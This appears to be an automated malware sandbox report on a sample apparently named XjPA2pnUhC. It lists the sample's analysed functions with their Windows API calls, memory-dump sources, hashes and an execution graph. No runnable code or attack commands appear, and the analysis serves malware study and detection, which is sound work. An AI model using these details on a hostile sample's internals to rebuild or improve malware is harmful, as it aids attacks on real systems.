                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FAE2E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                          • String ID:
                                                          • API String ID: 3990497365-0
                                                          • Opcode ID: 76e2db9a606ec1f21059914be9c60b416cae81aaec65223438ac5214d9ed400a
                                                          • Instruction ID: dc4819c79fc016468c261767d53983ddef597f18cf0b4078de5c96d2125ca4fd
                                                          • Opcode Fuzzy Hash: 76e2db9a606ec1f21059914be9c60b416cae81aaec65223438ac5214d9ed400a
                                                          • Instruction Fuzzy Hash: 2C415F7CA002589BDBA1DB68CC84BDAB7FD9B48350F4401E5A74CE7241EB74AF848F51
                                                          Function 029B0E73 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 029B0E8A
                                                            • Part of subcall function 029B14C2: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 029B14F1
                                                            • Part of subcall function 029B14C2: ___AdjustPointer.LIBCMT ref: 029B150C
                                                          • _UnwindNestedFrames.LIBCMT ref: 029B0EA1
                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 029B0EB3
                                                          • CallCatchBlock.LIBVCRUNTIME ref: 029B0ED7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                          • String ID:
                                                          • API String ID: 2901542994-0
                                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                          • Instruction ID: 4291b0f48bcaa8c7d972ba4269a563747e5a8c82e9ab90196f001b54ce6578d1
                                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                          • Instruction Fuzzy Hash: C201D332000109BBCF129F55CE04EEF7BBAEF99754F058414F95866120C376E8A1DFA0
                                                          Function 029B0541 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 029B0541
                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 029B0546
                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 029B054B
                                                            • Part of subcall function 029B1A4A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 029B1A5B
                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 029B0560
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                          • String ID:
                                                          • API String ID: 1761009282-0
                                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                          • Instruction ID: e0ff47ada5e02273375dfd34fd628df3a6f7f11594726d5039f285b79bd54bb5
                                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                          • Instruction Fuzzy Hash: 07C04C14800185542C137AF673203EF131F1CDB784BC055C5886D279065E55210B5C32
                                                          Function 0297B15B Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 234COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: e~E$NG
                                                          • API String ID: 3519838083-1735957280
                                                          • Opcode ID: 877520488350caf044840e68d165166ca8221db523610587b081686920612f7b
                                                          • Instruction ID: 7d16c8cf83a635d994edce599afb6c1eae67c4c7318d050fe2b4b3b391146f8d
                                                          • Opcode Fuzzy Hash: 877520488350caf044840e68d165166ca8221db523610587b081686920612f7b
                                                          • Instruction Fuzzy Hash: 9C6186B3B046145BEB04BE66CC65A2FBB9FFFD4758F08492DA446D3740E934CD048A92
                                                          Function 029C29CC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __fassign
                                                          • String ID: PkGNG
                                                          • API String ID: 3965848254-263838557
                                                          • Opcode ID: df6090bc8f26b7e29a48799c2f63ef8664aacbe2c579135c1419eb37ea41631a
                                                          • Instruction ID: 55d5a0d1d09001b68b839fb31ef57e50eccb1eaf48316888b3c0ee7fef81e208
                                                          • Opcode Fuzzy Hash: df6090bc8f26b7e29a48799c2f63ef8664aacbe2c579135c1419eb37ea41631a
                                                          • Instruction Fuzzy Hash: C6519371D00245AFDB14CFA8D885AEEBBF8EF09300F24456EE955E7291D770E940CB65
                                                          Function 0299363C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _memcmp_wcslen
                                                          • String ID: ?
                                                          • API String ID: 1846113162-1684325040
                                                          • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                          • Instruction ID: 939e6da09af7c8b581d2a999d89b6094dac8a7a53caf84c03ebe42644bad3db0
                                                          • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                          • Instruction Fuzzy Hash: E8419671504316EBDB20DF64D84CA9BB7ECEF84765F00096AF546C2161EB71C948CBEA
                                                          Function 0297929B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strftime
                                                          • String ID: dMG$|MG
                                                          • API String ID: 1867682108-1683252805
                                                          • Opcode ID: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                          • Instruction ID: be35851bf18d045ad935199c04829bf8df9e9de9e96e0ab74358e4e85376a737
                                                          • Opcode Fuzzy Hash: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                          • Instruction Fuzzy Hash: 11318D715043109FE724FB24ED55AAE77AAFBD4310F00883DE18E821A0EF749A49CF5A
                                                          Function 028F1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1967730a8783c3a73b0e5ee088072042cb8931304540ef423452cc0cc193eaa1
                                                          • Instruction ID: 6a3e185cb1d51b00a9ffaa1266c85978fe16819aa50bf7e773cc7b607c57fa30
                                                          • Opcode Fuzzy Hash: 1967730a8783c3a73b0e5ee088072042cb8931304540ef423452cc0cc193eaa1
                                                          • Instruction Fuzzy Hash: 30A1F36E7106008BD798AA7C9C883BDB3D2DBD4325F29823EE31DCB385EB64C9558751
                                                          Function 028F94EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,028F95DA), ref: 028F9572
                                                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,028F95DA), ref: 028F9578
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DateFormatLocaleThread
                                                          • String ID: yyyy
                                                          • API String ID: 3303714858-3145165042
                                                          • Opcode ID: 60d1affd2a8eed54d3ebca7c846d59a2599a8089dbf611d2c1a0a4dbb8c56749
                                                          • Instruction ID: 3584ea6a0e79893bb4c4632636ebd117d26ab62de3549235eab68ce9e257324a
                                                          • Opcode Fuzzy Hash: 60d1affd2a8eed54d3ebca7c846d59a2599a8089dbf611d2c1a0a4dbb8c56749
                                                          • Instruction Fuzzy Hash: 6A21627DA002589FDB90DFA8C841BAE73B9EF49700F5140A6EB05E7250D7349E40CB66
                                                          Function 0297BB97 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: o~E$NG
                                                          • API String ID: 3519838083-4065726910
                                                          • Opcode ID: 17fac1a1b046f946083fd2703b2f90ccc9ed52190986acb3cb5baead9464e690
                                                          • Instruction ID: dc578a174085ae21784887ac2044c5035be5942e22ef08b06ca87190acc20a66
                                                          • Opcode Fuzzy Hash: 17fac1a1b046f946083fd2703b2f90ccc9ed52190986acb3cb5baead9464e690
                                                          • Instruction Fuzzy Hash: FC213132D001089BDB14EBA4E856AEEB776EFD4720F20816AA519A2190EF351E49CF54
                                                          Function 02908338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029083C2), ref: 029083A4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                          • String ID: FlushInstructionCache$Kernel32
                                                          • API String ID: 3811539418-184458249
                                                          • Opcode ID: 6013f5392a6df9d0bf19102ad744d92c18f6d1b629aea6edfb25404938350080
                                                          • Instruction ID: 0aebe87da6ddc07a96364430b1fe49e960eff07797f7b21a42fff8e2da21e9fb
                                                          • Opcode Fuzzy Hash: 6013f5392a6df9d0bf19102ad744d92c18f6d1b629aea6edfb25404938350080
                                                          • Instruction Fuzzy Hash: 91016D79744308AFEB40EFE8EC81FAB77EDFB88B00F514461BA04D6680D670AD148B25
                                                          Function 02985D6A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029ABD91: __onexit.LIBCMT ref: 029ABD97
                                                          • __Init_thread_footer.LIBCMT ref: 029884F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Init_thread_footer__onexit
                                                          • String ID: ,kG$0kG
                                                          • API String ID: 1881088180-2015055088
                                                          • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                          • Instruction ID: 469d538b52e2bb4beaa54fda6e2500d7d400b0bdad1f2495b4f0ed660714a6e1
                                                          • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                          • Instruction Fuzzy Hash: C7E0D833100B218EC104B338D560A9537DBFB8A7287A5802BD40CD62D0CF1A64418DAD
                                                          Function 028F6498 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocValue
                                                          • String ID: (y]
                                                          • API String ID: 1189806713-574103996
                                                          • Opcode ID: e9afe0d3b98ccaabb66b72c5c6a291bc32c40443ea37f01570cb9b848997acad
                                                          • Instruction ID: 4c82b34636d174fe97c8dc3d4f0ae2f73c5470c1c64e50edb92734db9b07bab6
                                                          • Opcode Fuzzy Hash: e9afe0d3b98ccaabb66b72c5c6a291bc32c40443ea37f01570cb9b848997acad
                                                          • Instruction Fuzzy Hash: 55C0026CD4571546EB44BB799444A15379D9F20704B40CB156B64C714DFB34C414DF52
                                                          Function 0290AF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0290AF58
                                                          • IsBadWritePtr.KERNEL32(?,00000004), ref: 0290AF88
                                                          • IsBadReadPtr.KERNEL32(?,00000008), ref: 0290AFA7
                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0290AFB3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Read$Write
                                                          • String ID:
                                                          • API String ID: 3448952669-0
                                                          • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                          • Instruction ID: f76193f5ddc5a978fbb655fcb249b00a8aeb53c20c40a3269ef15f7719be71ad
                                                          • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                          • Instruction Fuzzy Hash: 1B216FB66407199FDB10DE6ACDC0BAA73A9EF40356F004521EF14D7281E778E81186D0

                                                          Execution Graph

                                                          Execution Coverage:4.5%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:4.7%
                                                          Total number of Nodes:1545
                                                          Total number of Limit Nodes:64
                                                          execution_graph 46934 2fcbea8 46935 2fcbeb4 _swprintf ___BuildCatchObject 46934->46935 46936 2fcbec2 46935->46936 46938 2fcbeec 46935->46938 46950 2fd062d 20 API calls __dosmaperr 46936->46950 46945 2fd5909 EnterCriticalSection 46938->46945 46940 2fcbec7 ___BuildCatchObject __cftof 46941 2fcbef7 46946 2fcbf98 46941->46946 46945->46941 46947 2fcbfa6 46946->46947 46949 2fcbf02 46947->46949 46952 2fd97ec 36 API calls 2 library calls 46947->46952 46951 2fcbf1f LeaveCriticalSection std::_Lockit::~_Lockit 46949->46951 46950->46940 46951->46940 46952->46947 46953 2fae04e 46955 2fae063 _Yarn ___scrt_get_show_window_mode 46953->46955 46954 2fae266 46961 2fae21a 46954->46961 46967 2fadbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 46954->46967 46955->46954 46972 2fc2f55 21 API calls _Yarn 46955->46972 46958 2fae277 46958->46961 46968 2fc2f55 21 API calls _Yarn 46958->46968 46960 2fae213 ___scrt_get_show_window_mode 46960->46961 46973 2fc2f55 21 API calls _Yarn 46960->46973 46963 2fae2b0 ___scrt_get_show_window_mode 46963->46961 46969 2fc35db 46963->46969 46965 2fae240 ___scrt_get_show_window_mode 46965->46961 46974 2fc2f55 21 API calls _Yarn 46965->46974 46967->46958 46968->46963 46975 2fc34fa 46969->46975 46971 2fc35e3 46971->46961 46972->46960 46973->46965 46974->46954 46976 2fc3513 46975->46976 46980 2fc3509 46975->46980 46976->46980 46981 2fc2f55 21 API calls _Yarn 46976->46981 46978 2fc3534 46978->46980 46982 2fc38c8 CryptAcquireContextA 46978->46982 46980->46971 46981->46978 46983 2fc38e9 CryptGenRandom 46982->46983 46984 2fc38e4 46982->46984 46983->46984 46985 2fc38fe CryptReleaseContext 46983->46985 46984->46980 46985->46984 46986 2fc4918 46987 2fc4924 ___BuildCatchObject 46986->46987 47013 2fc4627 46987->47013 46989 2fc492b 46991 2fc4954 46989->46991 47311 2fc4a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 46989->47311 46996 2fc4993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46991->46996 47312 2fd42d2 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 46991->47312 46993 2fc496d 46995 2fc4973 ___BuildCatchObject 46993->46995 47313 2fd4276 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 46993->47313 47003 2fc49f3 46996->47003 47314 2fd3487 35 API calls 3 library calls 46996->47314 47024 2fc4ba5 47003->47024 47006 2fc4a15 47007 2fc4a1f 47006->47007 47316 2fd34bf 28 API calls _Atexit 47006->47316 47009 2fc4a28 47007->47009 47317 2fd3462 28 API calls _Atexit 47007->47317 47318 2fc479e 13 API calls 2 library calls 47009->47318 47012 2fc4a30 47012->46995 47014 2fc4630 47013->47014 47319 